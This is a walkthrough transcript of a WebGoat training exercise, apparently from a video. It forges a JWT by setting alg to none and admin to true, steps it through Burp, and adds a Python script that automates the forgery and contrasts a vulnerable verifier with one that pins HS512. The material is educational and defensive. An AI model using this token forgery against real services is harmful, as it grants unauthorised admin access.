Hey everyone. Hopefully you had a chance to play with this and exploit this vulnerability based on the explanations on the first two pages of this. So I'm going to go through this step by step for those of you who weren't able to exploit it, and we'll talk about where the functionality and the weakness come from. So just to get some traffic we can look at, I'm going to go ahead and try to vote as the guest user. Going to vote as the Tom user, and then maybe I'll do a delete as the Jerry user, and a vote and a delete as the Sylvester user. So you can see we're not admin in any of those, and it's not letting us go through this. Go to our Burp proxy, pick one of the posts. So in this case, I'm going to pick the reset, because I want to go through the specific challenge of deleting something, and it looks like when I hit delete, it sends a reset for me. So to solve this challenge, we need to send the reset. I'm going to send this to the Repeater. So this is the individual post where it failed, and in the Repeater we can hit Go and see that only admins can do this. So I'm going to take the access token and put it in our little staging area just so that we have something to work with. So this is our access token, and we know from the previous specification that it's separated by dots. So we're going to break that up into three parts. We know that the first part is our header, we know that the second part is our claim, and we know the third part is our signature. So I'll indent those in a little bit. So we want to understand what the header is, what the claim is, and what the signature is. So I'm going to take the header, just copy it, and there's a decoder built into Burp. So I'm going to erase that and put it in the decoder. Now, if you don't have the second option here, all you do is click "decode as Base64" and you get your answer. So we know that the decoded access token has a header of that algorithm, and let's see what the claim is.
We copy the claim and paste it in here. You'll notice that the paste doesn't do a great job here, because this null terminator is messing up the hash. Sometimes you can validate it using a different decoder. Let's see if that works: Base64, no, that doesn't work. So I'm going to use a different decoder. CyberChef is a great tool; you can just Google CyberChef, and it's the first link that comes up. I'm going to put my Base64 string in here and convert it from Base64, and CyberChef did a better job decoding it. So I will paste that in here. Our claim is this. So it looks like we can probably just replace admin false with true, but we're not there yet, and we know that we can't decode the signature. It's going to be a signature. It's an encrypted blurb. So if I even try, it comes up as gibberish, so I won't. So let's modify these things. I'm going to just copy and paste it for now. So we can probably just make this a true statement, and we can put this back through our decoder so we can essentially re-encode it. So I'll just paste this here and encode as Base64, and we get that. So here is admin is true re-encoded, so now we have this value. Then we need to get a header. So the thought process here is, well, what other headers are possible? So to get that answer, we're going to go back to our WebGoat, and if you look here, there is a specification listed for the algorithms. Let's just open both of those up, and let's see if there's anything interesting in either of them. So I don't see header algorithm parameters on page 10. I don't see anything interesting in there. So let's go in here and see if there is a better cryptographic algorithm management for keys. Let's see if there's anything interesting there. So what are all the possible keys that I can use? There's a lot of keys in here, there we go. So header parameters for values of JWS. So it looks like we are using the 512, the HS512, so this one, and it seems to be a pretty optimal key.
So it doesn't feel like we can change it, but I wonder if we can use none. So let's go back to this header and modify that to none, and let's go ahead and get an encoded version of that and put it here. Finally, we know from the specification, because they told us on page 2, that the format is header.claim.signature. I'm going to paste that in there. For the header, I'm just going to copy this text and replace it with the header. The claim, I'm going to copy this text and put it here, and I don't have a signature, so I'm just going to leave it empty, but I'm going to leave a dot there just because that's part of the specification. So I'm going to leave it as is. I'm going to copy this new access token that I assembled, go back here, and go to my Repeater. I'm going to replace this access token, leaving the semicolon there in place. I'm just going to hit Go. So last time we did this, we got false; hit Go, and we get true. So we were able to essentially tell the server that we're not going to sign this next thing, and here's the access token that I'm going to send you.
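The manual Burp/CyberChef steps above, as an added Python example that is not part of the original walkthrough or of WebGoat's own code: it splits a token on the dots, decodes the header and claims as base64url (restoring the "=" padding that RFC 7515 strips, which is why a plain Base64 decoder can choke on a segment), flips alg to none and admin to true, and reassembles header.claim. with an empty signature segment. It also shows both sides of the server check: a verifier that lets the token pick its own algorithm (the weakness the lesson exploits) next to one that pins HS512 and refuses anything else. The server key, user names and the "admin" claim layout are constructed for the example; WebGoat's real endpoint may differ.

```python
import base64
import hashlib
import hmac
import json

# Constructed for this example: the HMAC key a hypothetical server signs with.
# Forging an alg=none token never needs it; it exists only so we can mint a
# realistic starting token and show a verifier that really checks signatures.
SERVER_KEY = b"example-server-secret-not-real"


def b64url_encode(raw: bytes) -> str:
    """JWS base64url: URL-safe alphabet with the '=' padding stripped (RFC 7515)."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode; restore the padding a plain decoder expects."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _json_segment(obj) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def hs512(signing_input: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input.encode("ascii"), hashlib.sha512).digest()


def mint_token(claims: dict, key: bytes = SERVER_KEY) -> str:
    """What the server hands out: header.claims.signature, signed with HS512."""
    header_b64 = _json_segment({"alg": "HS512"})
    claims_b64 = _json_segment(claims)
    sig_b64 = b64url_encode(hs512(f"{header_b64}.{claims_b64}", key))
    return f"{header_b64}.{claims_b64}.{sig_b64}"


def split_token(token: str):
    """Decode the three dot-separated segments; the signature stays raw bytes."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(claims_b64)),
            b64url_decode(sig_b64))


def forge_none_token(token: str, claim: str = "admin") -> str:
    """The manual steps as code: alg -> none, admin -> true, empty signature.
    The trailing dot stays because compact JWS always has three segments."""
    header, claims, _ = split_token(token)
    header["alg"] = "none"
    # Keep the claim's original type: the lesson's token carries admin as text.
    claims[claim] = True if isinstance(claims.get(claim), bool) else "true"
    return f"{_json_segment(header)}.{_json_segment(claims)}."


def verify_trusting_header(token: str, key: bytes = SERVER_KEY) -> dict:
    """Vulnerable verifier: the token chooses the algorithm it is checked with."""
    header, claims, sig = split_token(token)
    signing_input = token.rsplit(".", 1)[0]
    alg = header.get("alg")
    if alg == "none":  # unsecured JWS accepted with no signature at all
        return claims
    if alg == "HS512" and hmac.compare_digest(sig, hs512(signing_input, key)):
        return claims
    raise ValueError("bad signature")


def verify_pinned_alg(token: str, key: bytes = SERVER_KEY) -> dict:
    """Fixed verifier: the server decides the algorithm; 'none' is never an option."""
    header, claims, sig = split_token(token)
    signing_input = token.rsplit(".", 1)[0]
    if header.get("alg") != "HS512":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    if not hmac.compare_digest(sig, hs512(signing_input, key)):
        raise ValueError("bad signature")
    return claims


def accepts(verifier, token: str) -> bool:
    """True if the verifier returns claims for the token, False if it rejects it."""
    try:
        verifier(token)
        return True
    except ValueError:
        return False


def is_admin(claims: dict) -> bool:
    value = claims.get("admin")
    return value is True or str(value).lower() == "true"


if __name__ == "__main__":
    # Constructed sample: a Tom token with admin "false", like the lesson hands out.
    original = mint_token({"user": "Tom", "admin": "false"})
    forged = forge_none_token(original)
    print("original:", original)
    print("forged:  ", forged)
    print("vulnerable verifier grants admin:", is_admin(verify_trusting_header(forged)))
    print("pinned verifier accepts forged token:", accepts(verify_pinned_alg, forged))
```

Run it and the forged token ends in a bare dot, exactly as assembled in the Repeater; the trusting verifier returns admin true for it, while the pinned verifier rejects it and also rejects a signed token whose claims were edited without the key.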